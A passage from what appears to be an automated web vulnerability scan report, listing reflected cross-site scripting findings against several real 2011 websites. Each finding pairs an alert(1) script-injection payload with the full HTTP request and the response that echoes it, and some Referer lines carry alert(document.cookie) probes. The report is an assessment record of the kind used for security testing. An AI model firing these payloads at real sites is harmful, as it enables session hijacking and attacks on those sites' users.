NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /tools/diggthis.js%00f62e6"><script>alert(1)</script>b012967b31b HTTP/1.1
Host: digg.com
Proxy-Connection: keep-alive
Referer: http://www.gamershell.com/news_118846.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 13 Jun 2011 11:23:34 GMT
Server: Apache
X-Powered-By: PHP/5.2.9-digg8
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Set-Cookie: traffic_control=8434960700203493528%3A211; expires=Tue, 14-Jun-2011 11:23:35 GMT; path=/; domain=digg.com
Set-Cookie: d=dd1a33bf76cd1a3a30c4c728bf3e1f3a045257e336ebe233d2fdbe5db31f50e8; expires=Sat, 12-Jun-2021 21:31:15 GMT; path=/; domain=.digg.com
X-Digg-Time: D=746448 10.2.130.111
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Content-Length: 15097

<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>error_ - Digg</title>

<meta name="keywords" content="Digg, pictures, breaking news, entertainment, politics, technology
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title="Digg" href="/tools/diggthis.js%00f62e6"><script>alert(1)</script>b012967b31b.rss">
...[SNIP]...

4.126. http://event.adxpose.com/event.flow [uid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://event.adxpose.com
Path:   /event.flow

Issue detail

The value of the uid request parameter is copied into the HTML document as plain text between tags. The payload 878e8<script>alert(1)</script>ae45a7426be was submitted in the uid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /event.flow?eventcode=000_000_12&location=http%3A%2F%2Fthesouthern.com%2Fsports%2Fbasketball%2Farticle_c9733ff4-3bb8-56f0-83a0-e42a06ed2d38.html&uid=KxwltwQfcXn0PkkN_1000014620118878e8<script>alert(1)</script>ae45a7426be&xy=44%2C2676&wh=1065%2C926&vchannel=Centro&cid=Zenith-Sonic&iad=1307962922145-25851937336847188&cookieenabled=1&screenwh=1920%2C1200&adwh=728%2C90&colordepth=32&flash=10.3&iframed=0 HTTP/1.1
Host: event.adxpose.com
Proxy-Connection: keep-alive
Referer: http://thesouthern.com/sports/basketball/article_c9733ff4-3bb8-56f0-83a0-e42a06ed2d38.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: evlu=6805757a-ba62-4ca3-815c-dec40d38f03a

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=545B7F561D3473D82A16C9A7FB3C8C63; Path=/
Cache-Control: no-store
Content-Type: text/javascript;charset=UTF-8
Content-Length: 152
Date: Mon, 13 Jun 2011 11:02:10 GMT
Connection: close

if (typeof __ADXPOSE_EVENT_QUEUES__ !== "undefined") __ADXPOSE_DRAIN_QUEUE__("KxwltwQfcXn0PkkN_1000014620118878e8<script>alert(1)</script>ae45a7426be");

4.127. http://fonts.gawker.com/k/zvc4iwz-e.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://fonts.gawker.com
Path:   /k/zvc4iwz-e.css

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 9b845<script>alert(1)</script>d344801ae69 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /k9b845<script>alert(1)</script>d344801ae69/zvc4iwz-e.css?...[SNIP]... HTTP/1.1
Host: fonts.gawker.com
Proxy-Connection: keep-alive
Referer: http://kotaku.com/5811225/a-game-of-thrones-isnt-a-game-at-all-without-sean-bean
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: form_token=76a913a1dd4b346f61ad2a370c8c38ac; __qca=P0-500669253-1305981292998; __utmz=76883914.1305981293.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=76883914.1133493516.1305981293.1305981293.1305981293.1; ____GSV=dynamic

Response

HTTP/1.1 404 Not Found
Content-Type: text/plain
Date: Mon, 13 Jun 2011 11:23:25 GMT
Server: nginx/0.8.36
X-Runtime: 0.001039
Content-Length: 68

Not Found: /k9b845<script>alert(1)</script>d344801ae69/zvc4iwz-e.css

4.128. http://fonts.gawker.com/k/zvc4iwz-e.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://fonts.gawker.com
Path:   /k/zvc4iwz-e.css

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 9ef81<script>alert(1)</script>595f97f776b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /k/zvc4iwz-e.css9ef81<script>alert(1)</script>595f97f776b?...[SNIP]... HTTP/1.1
Host: fonts.gawker.com
Proxy-Connection: keep-alive
Referer: http://kotaku.com/5811225/a-game-of-thrones-isnt-a-game-at-all-without-sean-bean
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: form_token=76a913a1dd4b346f61ad2a370c8c38ac; __qca=P0-500669253-1305981292998; __utmz=76883914.1305981293.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=76883914.1133493516.1305981293.1305981293.1305981293.1; ____GSV=dynamic

Response

HTTP/1.1 404 Not Found
Content-Type: text/plain
Date: Mon, 13 Jun 2011 11:23:28 GMT
Server: nginx/0.8.36
X-Runtime: 0.000900
Content-Length: 68

Not Found: /k/zvc4iwz-e.css9ef81<script>alert(1)</script>595f97f776b

4.129. http://geo.gorillanation.com/geo.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://geo.gorillanation.com
Path:   /geo.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 23a25'%3balert(1)//994d27fcf7f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 23a25';alert(1)//994d27fcf7f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /geo.php?dynamic=0&website_id=/23a25'%3balert(1)//994d27fcf7f4600 HTTP/1.1
Host: geo.gorillanation.com
Proxy-Connection: keep-alive
Referer: http://www.tvfanatic.com/2011/06/game-of-thrones-review-baelor/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 200 OK
Date: Mon, 13 Jun 2011 11:22:42 GMT
Server: Apache/2.2.8 (EL)
X-Powered-By: PHP/5.1.6
Expires: Sat, 3 Sep 1977 05:00:00 GMT
Last-Modified: Mon, 13 Jun 2011 11:22:42 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
X-Served-By: app2v.lax1
Content-Length: 319
Content-Type: application/json; charset="utf-8"
X-Cache: MISS from pxy1v.lax1
X-Cache-Lookup: MISS from pxy1v.lax1:80
Via: 1.0 pxy1v.lax1:80 (squid/2.6.STABLE6)
Connection: close

gn_country='US';ip='173.193.214.243';exdate=new Date();exdate.setDate(exdate.getDate()+ 7);document.cookie="gn_country=US; expires=" + exdate.toGMTString() + "; path=/";document.write('<script src="http://cdn.triggertag.gorillanation.com/js//23a25';alert(1)//994d27fcf7f4600_US.php" type="text/javascript">
...[SNIP]...

4.130. http://geo.gorillanation.com/geo.php [website_id parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://geo.gorillanation.com
Path:   /geo.php

Issue detail

The value of the website_id request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 95b6c'%3balert(1)//6c8ffe311ff was submitted in the website_id parameter. This input was echoed as 95b6c';alert(1)//6c8ffe311ff in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /geo.php?dynamic=0&website_id=460095b6c'%3balert(1)//6c8ffe311ff HTTP/1.1
Host: geo.gorillanation.com
Proxy-Connection: keep-alive
Referer: http://www.tvfanatic.com/2011/06/game-of-thrones-review-baelor/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 200 OK
Date: Mon, 13 Jun 2011 11:22:41 GMT
Server: Apache/2.2.8 (EL)
X-Powered-By: PHP/5.1.6
Expires: Sat, 3 Sep 1977 05:00:00 GMT
Last-Modified: Mon, 13 Jun 2011 11:22:41 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
X-Served-By: app1v.lax1
Content-Length: 318
Content-Type: application/json; charset="utf-8"
X-Cache: MISS from pxy1v.lax1
X-Cache-Lookup: MISS from pxy1v.lax1:80
Via: 1.0 pxy1v.lax1:80 (squid/2.6.STABLE6)
Connection: close

gn_country='US';ip='173.193.214.243';exdate=new Date();exdate.setDate(exdate.getDate()+ 7);document.cookie="gn_country=US; expires=" + exdate.toGMTString() + "; path=/";document.write('<script src="http://cdn.triggertag.gorillanation.com/js/460095b6c';alert(1)//6c8ffe311ff_US.php" type="text/javascript">
...[SNIP]...

4.131. http://hollywoodcrush.mtv.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://hollywoodcrush.mtv.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4bc7e</script><script>alert(1)</script>4e5acb99ae0 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /favicon.ico4bc7e</script><script>alert(1)</script>4e5acb99ae0 HTTP/1.1
Host: hollywoodcrush.mtv.com
Proxy-Connection: keep-alive
Referer: http://moviesblog.mtv.com/2011/06/12/game-of-thrones-spoiler-death-sean-bean/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1864906649-1307963885068; mtvn_guid=1307963888-186; mbox=check#true#1307963954|session#1307963884869-321358#1307965754; __cs_rr=1

Response

HTTP/1.1 404 Not Found
Server: Apache/2
X-Powered-By: PHP/5.2.8
X-Pingback: http://hollywoodcrush.mtv.com/xmlrpc.php
Last-Modified: Mon, 13 Jun 2011 11:23:04 GMT
Pragma: no-cache
X-Cache-Term: short
Content-Type: text/html; charset=UTF-8
Content-Length: 28173
Cache-Control: must-revalidate, max-age=600
Expires: Mon, 13 Jun 2011 11:33:04 GMT
Date: Mon, 13 Jun 2011 11:23:04 GMT
Connection: close
Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
<head
...[SNIP]...
<script type="text/javascript">
mtvn.btg.Controller.sendPageCall( {
    pageName: 'BLOGS/hollywoodcrush/favicon.ico4bc7e</script><script>alert(1)</script>4e5acb99ae0',
    channel: 'BLOGS',
    hier1: 'BLOGS/hollywoodcrush/favicon.ico4bc7e</script>
...[SNIP]...

4.132. http://ib.adnxs.com/ab [ccd parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ib.adnxs.com
Path:   /ab

Issue detail

The value of the ccd request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f62e6'-alert(1)-'6d4ad6d0366 was submitted in the ccd parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ab?enc=9z3qr1e4EkD3PeqvV7gSQAAAAGBmZgJA9z3qr1e4EkD3PeqvV7gSQPrUl4kdQRoN_ayDGovBdy8O7vVNAAAAAIwuAAC1AAAANQEAAAIAAABnowUA0WMAAAEAAABVU0QAVVNEANQBPAAzC1gAZg8BAgUCAQQAAAAA_iM6CAAAAAA.&tt_code=vert-264&udj=uf%28%27a%27%2C+15288%2C+1307962894%29%3Buf%28%27r%27%2C+369511%2C+1307962894%29%3Bppv%2811776%2C+%27944138667005826298%27%2C+1307962894%2C+1310554894%2C+62058%2C+25553%29%3B&cnd=!lyFsawjq5AMQ58YWGAAg0ccBMAA4sxZAAEi1AlAAWABgVWgAcAJ49P0CgAFQiAHG5wKQAQGYAQGgAQOoAQOwAQG5AZDaLMJXuBJAwQGQ2izCV7gSQMkBCkQTNEFHAEDQAQDZAQAAAAAAAPA_4AEA&ccd=!fgW-Lgjq5AMQ58YWGNHHASAAf62e6'-alert(1)-'6d4ad6d0366&referrer=http://sportdfw.com/2011/06/13/10-observations-dallas-mavs-finals/&pp=TfXuDgADVm8K5X-LihNCfUBjKMj687om75Nzlg&pubclick=http://adclick.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DB5XEjDu71Te-sDYv_lQf9hM3QCO_675oCp537xBr7546PDAAQARgBIAA4AVCAx-HEBGDJ1vKGyKP8GoIBF2NhLXB1Yi05ODUzNzg0NjA2NTUxMzk3sgEMc3BvcnRkZncuY29tugEJNDY4eDYwX2FzyAEJ2gFCaHR0cDovL3Nwb3J0ZGZ3LmNvbS8yMDExLzA2LzEzLzEwLW9ic2VydmF0aW9ucy1kYWxsYXMtbWF2cy1maW5hbHMvmAKyD8ACBMgCq4KlDuACAOoCD0ZhbnNpZGVkXzQ2OHg2MKgDAegDiALoA9Mp6AOCAugDtQj1AwAAAMTgBAGABsCL7IGHsaCMNQ%26num%3D1%26sig%3DAGiWqtwD3vBQX40UZMj4tjEt-VoEhYeEGQ%26client%3Dca-pub-9853784606551397%26adurl%3D HTTP/1.1
Host: ib.adnxs.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: icu=ChIImdYCEAoYBCAEKAQw0ICz7wQQ0ICz7wQYAw..; uuid2=3420415245200633085; anj=Kfw)k>Mwz%)J70wBHz-D7`qokXhj-@aM)mVXjqrslj5ft[)'1yw[xphJSdzG.TF)0F^A`]BqTl-AR6`*)JP0AKozxfQE4@ZTQjq]rNTTlKqs3KL4-O(L$OYY]n=Fu!v//qc@$i3nq2_[o`94GmWdO0Bz@eLc*.`71nO<Z_$Uxo7CpH?*'y[3gS*4MLCLAUc5@r?XLOuqcg3M`mO_*!5UYGU#5(`mbnnx=hxk+]^04kmIQ5/@lg3[`MT!_-w*dO:K^3w5%z!c>wK::6cWF*>:oKm$@GTp*rMP#jcMyL@J[#@Cw65Eqv_>#V3r[J%[*<nKa<)Dn:*DWFX/5bNa8/+1*a#%MWnd*jrwZ[1nMujHwh48)Z_%aTTSWZ1=0MnH*f'UZlnAC]m)AUJ1(vbuE)$j2*'0!a['V8vZ4ig*C97YN3(WOPh_iGuYQ!7TBWIbIoOd9wMWuHVt1.@*tY/VH(3_aDA)y3PeL%fXVg0G'DDqj$WKSBU(?m1yqaoI^uXpwU1I^tKHQr3H.(X_0cm=y<=oa6_f*J4o)vR.yk*^]OC7`ZJ_K6qd<*VTIw_U`OL)YNc')g%2>I5$1(o1ikX@zjIkO?y1qMGFZ!G1`I!!!!!

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Tue, 14-Jun-2011 11:02:21 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=3420415245200633085; path=/; expires=Sun, 11-Sep-2011 11:02:21 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/javascript
Set-Cookie: anj=Kfw)k>JS.m*cOUs+'x*9/fov!U?-XD/@T`Eo*G>j9p6Kr5j'_7CgzlO:Fvgpkp?4[v=vwq`X_dWeNwpF6L1pOp0@m=r]@w@qmB`wa.gANc?%+]4$8<B8`4]:lCT3*9!qMQcil4XYmQ8WsDzIs#O67VmMmo)bHHWI6ZNYX0a_OT4xLEJYuSASUz$!y`uCnDKOlRBQu-`F+^8q^'[id[S7lqL3SyxsCSr9%@'BHMj:vbN!%A^*8GRvRZzGKBXAg>XGd5%ZV[>#w8#[npwDqVVGb#*ghU%C%7=MVqC2pmBp[Pxux0V[OL(pbe9FyrT[y*nF0xYV^1(9^IA4Y5vQ.63A13Xwt4yzbGW.9sLBw[mW8s6J_PV-8*MjghNoq:MVp!i%g:7B+-LBCkWVYq_!7QJ2ltk?f[Ob[1Nft-Sn1ma>DD[PDURe)51Ox>N/si@JJM]yC]x.!/L]TZ*wZi@6w8U'aoF=ae0W!Uew.vN=.wG!rYe0n(oapLJIa%K^mCY1KfotBEb; path=/; expires=Sun, 11-Sep-2011 11:02:21 GMT; domain=.adnxs.com; HttpOnly
Date: Mon, 13 Jun 2011 11:02:21 GMT
Content-Length: 1087

document.write('<a href="http://ib.adnxs.com/click/hetRuB6F_z-F61G4HoX_PwAAAGBmZgJA9z3qr1e4EkD3PeqvV7gSQPrUl4kdQRoN_ayDGovBdy8O7vVNAAAAAIwuAAC1AAAANQEAAAIAAABnowUA0WMAAAEAAABVU0QAVVNEANQBPAAzC1gAZg8BAgUCAQQAAAAAViRkLAAAAAA./cnd=!fgW-Lgjq5AMQ58YWGNHHASAAf62e6'-alert(1)-'6d4ad6d0366/referrer=http%3A%2F%2Fsportdfw.com%2F2011%2F06%2F13%2F10-observations-dallas-mavs-finals%2F/clickenc=http%3A%2F%2Fadclick.g.doubleclick.net%2Faclk%3Fsa%3Dl%26ai%3DB5XEjDu71Te-sDYv_lQf9hM3QCO_675oCp537
...[SNIP]...

4.133. http://ib.adnxs.com/ptj [redir parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ib.adnxs.com
Path:   /ptj

Issue detail

The value of the redir request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 81d22'%3balert(1)//9572c2aecfb was submitted in the redir parameter. This input was echoed as 81d22';alert(1)//9572c2aecfb in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ptj?member=514&size=728x90&referrer=http://thesouthern.com/sports/basketball/article_c9733ff4-3bb8-56f0-83a0-e42a06ed2d38.html%3Fc03b0%2522-alert(document.cookie)-%25225958ea17fd2=1&inv_code=748066&redir=http%3A%2F%2Fad.yieldmanager.com%2Fimp%3Fanmember%3D514%26anprice%3D%7BPRICEBUCKET%7D%26Z%3D728x90%26s%3D748066%26r%3D1%26_salt%3D1188639314%26u%3Dhttp%253A%252F%252Fthesouthern.com%252Fsports%252Fbasketball%252Farticle_c9733ff4-3bb8-56f0-83a0-e42a06ed2d38.html%253Fc03b0%252522-alert%2528document.cookie%2529-%2525225958ea17fd2%253D1%26u%3Dhttp%3A%2F%2Fthesouthern.com%2Fsports%2Fbasketball%2Farticle_c9733ff4-3bb8-56f0-83a0-e42a06ed2d38.html%3Fc03b0%2522-alert%28document.cookie%29-%25225958ea17fd2%3D181d22'%3balert(1)//9572c2aecfb HTTP/1.1
Host: ib.adnxs.com
Proxy-Connection: keep-alive
Referer: http://thesouthern.com/sports/basketball/article_c9733ff4-3bb8-56f0-83a0-e42a06ed2d38.html?c03b0%22-alert(document.cookie)-%225958ea17fd2=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: icu=ChIImdYCEAoYBCAEKAQw0ICz7wQQ0ICz7wQYAw..; anj=Kfw)k>JS.m*cOUs+'x*9/fov!U?-XD/@T`Eo*G>j9p6Kr5j'_7CgzlO:Fvgpkp?4[v=vwq`X_dWeNwpF6L1pOp0@m=r]@w@qmB`wa.gANc?%+]4$8<B8`4]:lCT3*9!qMQcil4XYmQ8WsDzIs#O67VmMmo)bHHWI6ZNYX0a_OT4xLEJYuSASUz$!y`uCnDKOlRBQu-`F+^8q^'[id[S7lqL3SyxsCSr9%@'BHMj:vbN!%A^*8GRvRZzGKBXAg>XGd5%ZV[>#w8#[npwDqVVGb#*ghU%C%7=MVqC2pmBp[Pxux0V[OL(pbe9FyrT[y*nF0xYV^1(9^IA4Y5vQ.63A13Xwt4yzbGW.9sLBw[mW8s6J_PV-8*MjghNoq:MVp!i%g:7B+-LBCkWVYq_!7QJ2ltk?f[Ob[1Nft-Sn1ma>DD[PDURe)51Ox>N/si@JJM]yC]x.!/L]TZ*wZi@6w8U'aoF=ae0W!Uew.vN=.wG!rYe0n(oapLJIa%K^mCY1KfotBEb; sess=1; uuid2=3420415245200633085

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Tue, 14-Jun-2011 11:20:38 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=3420415245200633085; path=/; expires=Sun, 11-Sep-2011 11:20:38 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: acb142304=; path=/; expires=Fri, 01-Jan-1980 00:00:00 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: icu=ChEIs34QChgBIAEoATCP5NfvBAoSCMmhAxAKGAMgAygDMIbl1-8EEIbl1-8EGAM.; path=/; expires=Sun, 11-Sep-2011 11:20:38 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: acb830492=![nC'kI/7Z208jSAtaS(d]iDt?enc=9inHZHH_8D_vYB_4c-XsPwAAAKCZmQFA72Af-HPl7D_2Kcdkcf_wPyux69QhF0By_ayDGovBdy-G8vVNAAAAAMf7BwACAgAANQEAAAIAAABqowUADB8BAAEAAABVU0QAVVNEANgCWgDwAgAAPRABAgUCAQUAAAAAzieUmQAAAAA.&tt_code=748066&udj=uf%28%27a%27%2C+15288%2C+1307964038%29%3Buf%28%27r%27%2C+369514%2C+1307964038%29%3Bppv%2811776%2C+%278232605552906842411%27%2C+1307964038%2C+1310556038%2C+62058%2C+73484%29%3B&cnd=!oyV-jgjq5AMQ6sYWGAAgjL4EMAA48AVAAEi1AlDH9x9YAGBVaABwBHgMgAGoAYgBAJABAZgBAaABA6gBA7ABAbkBAZauyHH_8D_BAQGWrshx__A_yQGI_C6Qt-feP9ABANkBAAAAAAAA8D_gAQA.&ccd=!NgVlLQjq5AMQ6sYWGIy-BCAA; path=/; expires=Tue, 14-Jun-2011 11:20:38 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: anj=Kfw)k=m<8a)J710Kt5aQ:PPuz.Z_6mg=p)#A_CV1L8mL#XXrY@'%SJv4c_/-XRX^M#>#0@[1jepIJI6E8zF'H=%jtH^_1VW)f3]4l%1@Sm@vnGn?R**s'RplLm%kx_bK:q5l>ivpnm-LKN$GN@x+lNA5Cuikkj7sn9xm]`J=KC.=:^:VjY4M_zK72^kT0P8PJlB'gmMTqPZD]i:/2(LP@ZSDJtjsMnWaZ_[%R'BsAFw7w[MS41A09JtN^8-H_wg%57bUOx*lC*-725*??#YJ5eAI2^O^zte(BohUm_LMr!yNlWER*tFuZZq[XP'u*=#$sbT9ivHo^PgNdv*Cw-Ffdc^N3wB-0>@mKd%9Jc:3LoP*`5_626$/u@vn]fbDK5wJL9BA4*S9vZ986)u@Iw8?KjY+Vo97wwNlttsp@d_`YZx-4qr:P.brt+'Y$lt'L$Czp#-`/AY=zpFTmxS$35Me3n0^t?5IFGts<P[dM>5G@OLkg6>h$@H0nFCD5tbki%.rk04x9h/#MPo(n:.)#)rC^.#X4Vk2Pi!(!wv*jbFzW>a59$ZSM*M%mnE)@T+zK(ngDPUnQ*fT(7V]5/mJ`I5u-sA4+<`%@kF>`GsZzMR=VXcl7:@#pmk]F9Y$]JJ59?0*vMgv$u'Q.*M^5m8SJM3BW%w/); path=/; expires=Sun, 11-Sep-2011 11:20:38 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/javascript
Date: Mon, 13 Jun 2011 11:20:38 GMT
Content-Length: 640

document.write('<scr'+'ipt type="text/javascript"src="http://ad.yieldmanager.com/imp?anmember=514&anprice=90&Z=728x90&s=748066&r=1&_salt=1188639314&u=http%3A%2F%2Fthesouthern.com%2Fsports%2Fbasketball
...[SNIP]...
Fc03b0%2522-alert%28document.cookie%29-%25225958ea17fd2%3D1&u=http://thesouthern.com/sports/basketball/article_c9733ff4-3bb8-56f0-83a0-e42a06ed2d38.html?c03b0%22-alert(document.cookie)-%225958ea17fd2=181d22';alert(1)//9572c2aecfb">
...[SNIP]...

4.134. http://idolator.com/ifb/audience-science.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://idolator.com
Path:   /ifb/audience-science.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2c73f"><script>alert(1)</script>40fd068c3fa was submitted in the REST URL parameter 1. This input was echoed as 2c73f\"><script>alert(1)</script>40fd068c3fa in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ifb2c73f"><script>alert(1)</script>40fd068c3fa/audience-science.html HTTP/1.1
Host: idolator.com
Proxy-Connection: keep-alive
Referer: http://idolator.com/wp-content2f889%22%3E%3Cscript%3Ealert(%22FAVICON%22)%3C/script%3Ed06b96a1bc7/themes/idolator_1.5/images/favicon.ico
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=c489d4009ebc793736408e674190920c; __utmz=183537278.1307964748.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/6; __utma=183537278.928599552.1307964748.1307964748.1307964748.1; __utmc=183537278; __utmb=183537278.1.10.1307964748; VWCUKP300=L123100/Q72996_13937_1944_061311_1_070411_445236x444947x061311x1x1; SVWCUKP300=445236_1; __qca=P0-1567452271-1307964766769

Response

HTTP/1.1 404 Not Found
Date: Mon, 13 Jun 2011 11:33:24 GMT
Server: Apache
X-Powered-By: PHP/5.3.6
Vary: Cookie,Accept-Encoding
X-Pingback: http://idolator.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
